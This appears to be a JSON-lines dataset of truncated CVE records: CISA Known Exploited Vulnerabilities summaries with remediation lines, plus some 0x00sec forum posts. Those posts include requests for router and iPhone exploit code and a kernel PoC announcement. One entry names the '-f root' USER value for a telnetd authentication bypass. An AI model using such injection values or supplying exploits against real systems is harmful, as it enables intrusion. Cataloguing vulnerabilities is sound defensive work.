{"id": "51ff3fb3f863bfaf21eb", "text": "Abusing HTTP HEAD for Java Deserialization RCE (CVE-2025-12059)\n\nCVE-2025-12059 CWE-502, 538 Unauthenticated Java Deserialization RCE via HTTP HEAD Request Date: 2025-10-04 Severity: Critical (CVSS v3.1 = 9.8 ) (Full system compromise risk) AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Etki Kapsamı: Startupv3.29.6.4 Finder : Enay Sınıflar: com.lbs.start.JLbsStartup , com.lbs.start.SocketToken https://www.cve.org/cverecord?id=CVE-2025-12059 The application uses the DOCUMENT_URI parameter contained in the J", "cve_id": "CVE-2025-12059", "source": "0x00sec", "timestamp": ""} {"id": "4324bfbbfbbf2c797930", "text": "CVE-2025-6982 | Vulnerability of TP-Link Archer C50\n\nHi everyone, I’m researching CVE-2025-6982 , which affects the TP-Link Archer C50 and potentially allows access to administrative credentials and Wi-Fi passwords. Despite my efforts, I haven’t been able to find the specific Proof of Concept (PoC) or exploit code for it. I apologize if this seems like a basic question, but I’ve hit a dead end in my search. Does anyone know where to find documentation or exploit details for vulnerabilities that ", "cve_id": "CVE-2025-6982", "source": "0x00sec", "timestamp": ""} {"id": "7f15f9acb9de5e40d37b", "text": "Yes, of course! That would be great, especially the one for the iPhone. I was actually hoping for more—what about making some tutorials on one-click exploit development for the iPhone? e.g : CVE-2025-24252, CVE-2026-20700, CVE-2025-24132, CVE-2025-43200, CVE-2025-43300, CVE-2026-20661, CVE-2025-43529", "cve_id": "CVE-2026-20661", "source": "0x00sec", "timestamp": ""} {"id": "a2f830ebe4e031aa681d", "text": "Cve-2026-23416-poc\n\nThis is a poc for vulnerability I discovered in linux kernel 6.17-linux kernel 7 rc5 github.com GitHub - bluedragonsecurity/CVE-2026-23416-POC: POC for CVE-2026-23416 (linux kernel 6.17-linux... POC for CVE-2026-23416 (linux kernel 6.17-linux kernel 7 rc5) - vulnerability discovered by Antonius SUMMARY An invariant violation (VM_WARN_ON_VMG) fires at mm/vma.c:830 inside vma_merge_existing_range() when mseal(2) is called with a range spanning two adjacent VMAs where one has VM", "cve_id": "CVE-2026-23416", "source": "0x00sec", "timestamp": ""} {"id": "a81af2c21042a92d6fdd", "text": "Below Local Privilege Escalation Vulnerability: A light look at CVE-2025-27591\n\nThis topic is for discussion of the post Below Local Privilege Escalation Vulnerability: A light look at CVE-2025-27591 . CVE-2025-27591 is a Local Privilege Escalation (LPE) vulnerability affecting below, a time-traveling resource monitor for Linux developed by Facebook Incubator. Please feel free to discuss the post and ask any questions in this topic.", "cve_id": "CVE-2025-27591", "source": "0x00sec", "timestamp": ""} {"id": "CVE-2026-32201", "text": "Microsoft SharePoint Server Improper Input Validation Vulnerability\n\nAffected: Microsoft SharePoint Server\n\nMicrosoft SharePoint Server contains an improper input validation vulnerability that allows an unauthorized attacker to perform spoofing over a network.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerab", "cve_id": "CVE-2026-32201", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-60710", "text": "Microsoft Windows Link Following Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows contains a link following vulnerability that allows for privilege escalation\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-59\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-60710", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21643", "text": "Fortinet SQL Injection Vulnerability\n\nAffected: Fortinet FortiClient EMS\n\nFortinet FortiClient EMS contains a SQL injection vulnerability that may allow an unauthenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-89\n\n[Source: CISA Known Exploited Vulnera", "cve_id": "CVE-2026-21643", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-34621", "text": "Adobe Acrobat and Reader Prototype Pollution Vulnerability\n\nAffected: Adobe Acrobat and Reader\n\nAdobe Acrobat and Reader contain a prototype pollution vulnerability that allows for arbitrary code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-1321\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2026-34621", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-1340", "text": "Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability\n\nAffected: Ivanti Endpoint Manager Mobile (EPMM)\n\nIvanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability that could allow attackers to achieve unauthenticated remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2026-1340", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-35616", "text": "Fortinet FortiClient EMS Improper Access Control Vulnerability\n\nAffected: Fortinet FortiClient EMS\n\nFortinet FortiClient EMS contains an improper access control vulnerability that may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Kno", "cve_id": "CVE-2026-35616", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-3502", "text": "TrueConf Client Download of Code Without Integrity Check Vulnerability\n\nAffected: TrueConf Client\n\nTrueConf Client contains a download of code without integrity check vulnerability. An attacker who is able to influence the update delivery path can substitute a tampered update payload. If the payload is executed or installed by the updater, this may result in arbitrary code execution in the context of the updating process or user.\n\nRequired Action: Apply mitigations per vendor instructions, follo", "cve_id": "CVE-2026-3502", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-5281", "text": "Google Dawn Use-After-Free Vulnerability\n\nAffected: Google Dawn\n\nGoogle Dawn contains an use-after-free vulnerability that could allow a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. This vulnerability could affect multiple Chromium-based products including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services,", "cve_id": "CVE-2026-5281", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-3055", "text": "Citrix NetScaler Out-of-Bounds Read Vulnerability\n\nAffected: Citrix NetScaler\n\nCitrix NetScaler ADC (formerly Citrix ADC), NetScaler Gateway (formerly Citrix Gateway) and NetScaler ADC FIPS and NDcPP contain an out-of-bounds reads vulnerability when configured as a SAML IDP leading to memory overread.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-", "cve_id": "CVE-2026-3055", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-53521", "text": "F5 BIG-IP Stack-Based Buffer Overflow Vulnerability\n\nAffected: F5 BIG-IP\n\nF5 BIG-IP APM contains a stack-based buffer overflow vulnerability that could allow a threat actor to achieve remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-121\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-53521", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-33634", "text": "Aquasecurity Trivy Embedded Malicious Code Vulnerability\n\nAffected: Aquasecurity Trivy\n\nAquasecurity Trivy contains an embedded malicious code vulnerability that could allow an attacker to gain access to everything in the CI/CD environment, including all tokens, SSH keys, cloud credentials, database passwords, and any sensitive configuration in memory.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the p", "cve_id": "CVE-2026-33634", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-33017", "text": "Langflow Code Injection Vulnerability\n\nAffected: Langflow Langflow\n\nLangflow contains a code injection vulnerability that could allow building public flows without requiring authentication.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94, CWE-95, CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2026-33017", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-32432", "text": "Craft CMS Code Injection Vulnerability\n\nAffected: Craft CMS Craft CMS\n\nCraft CMS contains a code injection vulnerability that allows a remote attacker to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-32432", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-54068", "text": "Laravel Livewire Code Injection Vulnerability\n\nAffected: Laravel Livewire\n\nLaravel Livewire contain a code injection vulnerability that could allow unauthenticated attackers to achieve remote command execution in specific scenarios.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-54068", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-43510", "text": "Apple Multiple Products Improper Locking Vulnerability\n\nAffected: Apple Multiple Products\n\nApple watchOS, iOS, iPadOS, macOS, visionOS, and tvOS contain an improper locking vulnerability that could allow a malicious application to cause unexpected changes in memory shared between processes.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-667\n\n[Sourc", "cve_id": "CVE-2025-43510", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-43520", "text": "Apple Multiple Products Classic Buffer Overflow Vulnerability\n\nAffected: Apple Multiple Products\n\nApple watchOS, iOS, iPadOS, macOS, visionOS, and tvOS contain a classic buffer overflow vulnerability which could allow a malicious application to cause unexpected system termination or write kernel memory.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CW", "cve_id": "CVE-2025-43520", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-31277", "text": "Apple Multiple Products Buffer Overflow Vulnerability\n\nAffected: Apple Multiple Products\n\nApple Safari, iOS, watchOS, visionOS, iPadOS, macOS, and tvOS contain a buffer overflow vulnerability that could allow the processing of maliciously crafted web content which may lead to memory corruption.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-119\n\n[S", "cve_id": "CVE-2025-31277", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20131", "text": "Cisco Secure Firewall Management Center (FMC) Software and Cisco Security Cloud Control (SCC) Firewall Management Deserialization of Untrusted Data Vulnerability\n\nAffected: Cisco Secure Firewall Management Center (FMC)\n\nCisco Secure Firewall Management Center (FMC) Software and Cisco Security Cloud Control (SCC) Firewall Management contain a deserialization of untrusted data vulnerability in the web-based management interface that could allow an unauthenticated, remote attacker to execute arbitr", "cve_id": "CVE-2026-20131", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-66376", "text": "Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability in the Classic UI where attackers could abuse Cascading Style Sheets (CSS) @import directives in email HTML.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unav", "cve_id": "CVE-2025-66376", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20963", "text": "Microsoft SharePoint Deserialization of Untrusted Data Vulnerability\n\nAffected: Microsoft SharePoint\n\nMicrosoft SharePoint contains a deserialization of untrusted data vulnerability that allows an unauthorized attacker to execute code over a network.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities C", "cve_id": "CVE-2026-20963", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-47813", "text": "Wing FTP Server Information Disclosure Vulnerability\n\nAffected: Wing FTP Server Wing FTP Server\n\nWing FTP Server contains a generation of error message containing sensitive information vulnerability when using a long value in the UID cookie.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-209\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-47813", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-3910", "text": "Google Chromium V8 Improper Restriction of Operations Within the Bounds of a Memory Buffer Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 contains an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and O", "cve_id": "CVE-2026-3910", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-3909", "text": "Google Skia Out-of-Bounds Write Vulnerability\n\nAffected: Google Skia\n\nGoogle Skia contains an out-of-bounds write vulnerability that could allow a remote attacker to perform out of bounds memory access via a crafted HTML page. This vulnerability affects Google Chrome and ChromeOS, Android, Flutter, and possibly other products.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are ", "cve_id": "CVE-2026-3909", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-68613", "text": "n8n Improper Control of Dynamically-Managed Code Resources Vulnerability\n\nAffected: n8n n8n\n\nn8n contains an improper control of dynamically managed code resources vulnerability in its workflow expression evaluation system that allows for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-913\n\n[Source: CISA Known Exploited Vulner", "cve_id": "CVE-2025-68613", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-26399", "text": "SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability\n\nAffected: SolarWinds Web Help Desk\n\nSolarWinds Web Help Desk contain a deserialization of untrusted data vulnerability in AjaxProxy that could allow an attacker to run commands on the host machine.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploi", "cve_id": "CVE-2025-26399", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-1603", "text": "Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability\n\nAffected: Ivanti Endpoint Manager (EPM)\n\nIvanti Endpoint Manager (EPM) contains an authentication bypass using an alternate path or channel vulnerability that could allow a remote unauthenticated attacker to leak specific stored credential data.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nC", "cve_id": "CVE-2026-1603", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-22719", "text": "Broadcom VMware Aria Operations Command Injection Vulnerability\n\nAffected: Broadcom VMware Aria Operations\n\nBroadcom VMware Aria Operations formerly known as vRealize Operations (vROps) contains a command injection vulnerability that allows an unauthenticated attacker to execute arbitrary commands, potentially leading to remote code execution during support‑assisted product migration.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud serv", "cve_id": "CVE-2026-22719", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21385", "text": "Qualcomm Multiple Chipsets Memory Corruption Vulnerability\n\nAffected: Qualcomm Multiple Chipsets\n\nMultiple Qualcomm chipsets contain a memory corruption vulnerability while using alignments for memory allocation. \n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-190\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2026-21385", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20127", "text": "Cisco Catalyst SD-WAN Controller and Manager Authentication Bypass Vulnerability\n\nAffected: Cisco Catalyst SD-WAN Controller and Manager\n\nCisco Catalyst SD-WAN Controller, formerly SD-WAN vSmart, and Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, contain an authentication bypass vulnerability could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system. This vulnerability exists because the peering authentication mec", "cve_id": "CVE-2026-20127", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-25108", "text": "Soliton Systems K.K FileZen OS Command Injection Vulnerability\n\nAffected: Soliton Systems K.K FileZen\n\nSoliton Systems K.K FileZen contains an OS command injection vulnerability when an user logs-in to the affected product and sends a specially crafted HTTP request.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2026-25108", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-49113", "text": "RoundCube Webmail Deserialization of Untrusted Data Vulnerability\n\nAffected: Roundcube Webmail\n\nRoundCube Webmail contains a deserialization of untrusted data vulnerability that allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unava", "cve_id": "CVE-2025-49113", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-68461", "text": "RoundCube Webmail Cross-site Scripting Vulnerability\n\nAffected: Roundcube Webmail\n\nRoundCube Webmail contains a cross-site scripting vulnerability via the animate tag in an SVG document.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-79\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-68461", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-22769", "text": "Dell RecoverPoint for Virtual Machines (RP4VMs) Use of Hard-coded Credentials Vulnerability\n\nAffected: Dell RecoverPoint for Virtual Machines (RP4VMs)\n\nDell RecoverPoint for Virtual Machines (RP4VMs) contains an use of hard-coded credentials vulnerability that could allow an unauthenticated remote attacker to gain unauthorized access to the underlying operating system and root-level persistence.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for", "cve_id": "CVE-2026-22769", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-7694", "text": "TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability\n\nAffected: TeamT5 ThreatSonar Anti-Ransomware\n\nTeamT5 ThreatSonar Anti-Ransomware contains an unrestricted upload of file with dangerous type vulnerability. ThreatSonar Anti-Ransomware does not properly validate the content of uploaded files. Remote attackers with administrator privileges on the product platform can upload malicious files, which can be used to execute arbitrary system commands on the", "cve_id": "CVE-2024-7694", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-2441", "text": "Google Chromium CSS Use-After-Free Vulnerability\n\nAffected: Google Chromium\n\nGoogle Chromium CSS contains a use-after-free vulnerability that could allow a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud servic", "cve_id": "CVE-2026-2441", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-1731", "text": "BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) OS Command Injection Vulnerability\n\nAffected: BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA)\n\nBeyondTrust Remote Support (RS) and Privileged Remote Access (PRA)contain an OS command injection vulnerability. Successful exploitation could allow an unauthenticated remote attacker to execute operating system commands in the context of the site user. Successful exploitation requires no authentication or user intera", "cve_id": "CVE-2026-1731", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-20700", "text": "Apple Multiple Buffer Overflow Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, macOS, tvOS, watchOS, and visionOS contain an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow an attacker with memory write the capability to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCW", "cve_id": "CVE-2026-20700", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-43468", "text": "Microsoft Configuration Manager SQL Injection Vulnerability\n\nAffected: Microsoft Configuration Manager\n\nMicrosoft Configuration Manager contains an SQL injection vulnerability. An unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the target environment which are processed in an unsafe manner enabling the attacker to execute commands on the server and/or underlying database.\n\nRequired Action: Apply mitigations per vendor instructions, follow applic", "cve_id": "CVE-2024-43468", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-15556", "text": "Notepad++ Download of Code Without Integrity Check Vulnerability\n\nAffected: Notepad++ Notepad++\n\nNotepad++ when using the WinGUp updater, contains a download of code without integrity check vulnerability that could allow an attacker to intercept or redirect update traffic to download and execute an attacker-controlled installer. This could lead to arbitrary code execution with the privileges of the user.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 gui", "cve_id": "CVE-2025-15556", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-40536", "text": "SolarWinds Web Help Desk Security Control Bypass Vulnerability\n\nAffected: SolarWinds Web Help Desk\n\nSolarWinds Web Help Desk contains a security control bypass vulnerability that could allow an unauthenticated attacker to gain access to certain restricted functionality.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2025-40536", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21513", "text": "Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft MSHTML Framework contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploited ", "cve_id": "CVE-2026-21513", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21525", "text": "Microsoft Windows NULL Pointer Dereference Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-476\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2026-21525", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21510", "text": "Microsoft Windows Shell Protection Mechanism Failure Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network. \n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-693\n\n[Source: CISA Known Exploited Vulne", "cve_id": "CVE-2026-21510", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21533", "text": "Microsoft Windows Improper Privilege Management Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-269\n\n[Source: CISA Known Exploited Vulnera", "cve_id": "CVE-2026-21533", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21519", "text": "Microsoft Windows Type Confusion Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2026-21519", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-21514", "text": "Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability\n\nAffected: Microsoft Office\n\nMicrosoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-807\n\n[Source: CI", "cve_id": "CVE-2026-21514", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-11953", "text": "React Native Community CLI OS Command Injection Vulnerability\n\nAffected: React Native Community CLI\n\nReact Native Community CLI contains an OS command injection vulnerability which could allow unauthenticated network attackers to send POST requests to the Metro Development Server and run arbitrary executables via a vulnerable endpoint exposed by the server. On Windows, attackers can also execute arbitrary shell commands with fully controlled arguments.\n\nRequired Action: Apply mitigations per ven", "cve_id": "CVE-2025-11953", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-24423", "text": "SmarterTools SmarterMail Missing Authentication for Critical Function Vulnerability\n\nAffected: SmarterTools SmarterMail\n\nSmarterTools SmarterMail contains a missing authentication for critical function vulnerability in the ConnectToHub API method. This could allow the attacker to point the SmarterMail instance to a malicious HTTP server which serves the malicious OS command and could lead to command execution. \n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22", "cve_id": "CVE-2026-24423", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-64328", "text": "Sangoma FreePBX OS Command Injection Vulnerability\n\nAffected: Sangoma FreePBX\n\nSangoma FreePBX Endpoint Manager contains an OS command injection vulnerability that could allow for a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function. An attacker can leverage this vulnerability to potentially obtain remote access to the system as an asterisk user. \n\nRequired Action: Apply mitigations per vendor instructions, follow applicabl", "cve_id": "CVE-2025-64328", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-40551", "text": "SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability\n\nAffected: SolarWinds Web Help Desk\n\nSolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the produ", "cve_id": "CVE-2025-40551", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-24858", "text": "Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability\n\nAffected: Fortinet Multiple Products\n\nFortinet FortiAnalyzer, FortiManager, FortiOS, and FortiProxy contain an authentication bypass using an alternate path or channel that could allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.\n\nRequired Action: Apply mitigations ", "cve_id": "CVE-2026-24858", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-52691", "text": "SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability\n\nAffected: SmarterTools SmarterMail\n\nSmarterTools SmarterMail contains an unrestricted upload of file with dangerous type vulnerability that could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or disco", "cve_id": "CVE-2025-52691", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-23760", "text": "SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability\n\nAffected: SmarterTools SmarterMail\n\nSmarterTools SmarterMail contains an authentication bypass using an alternate path or channel vulnerability in the password reset API. The force-reset-password endpoint permits anonymous requests and fails to verify the existing password or a reset token when resetting system administrator accounts. This could allow an unauthenticated attacker to supply a target ad", "cve_id": "CVE-2026-23760", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2026-24061", "text": "GNU InetUtils Argument Injection Vulnerability\n\nAffected: GNU InetUtils\n\nGNU InetUtils contains an argument injection vulnerability in telnetd that could allow for remote authentication bypass via a \"-f root\" value for the USER environment variable.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-88\n\n[Source: CISA Known Exploited Vulnerabilities Cat", 